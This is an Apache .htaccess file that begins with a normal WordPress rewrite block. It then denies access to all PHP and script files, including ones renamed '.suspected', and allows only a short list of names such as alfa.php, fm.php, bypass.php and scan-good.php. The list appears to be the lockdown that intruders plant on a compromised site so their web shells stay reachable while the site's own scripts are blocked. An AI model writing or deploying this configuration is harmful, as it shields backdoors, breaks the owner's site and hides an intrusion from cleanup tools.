<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php6|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(install.php|test.php|data.php|writeable.php|content.php|admin.php|page.php|fm.php|dashboard.php|index.php|404.php|bypass.php|scan-good.php|info.php|optimizer.php|404.php|admin1.php|alfa.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>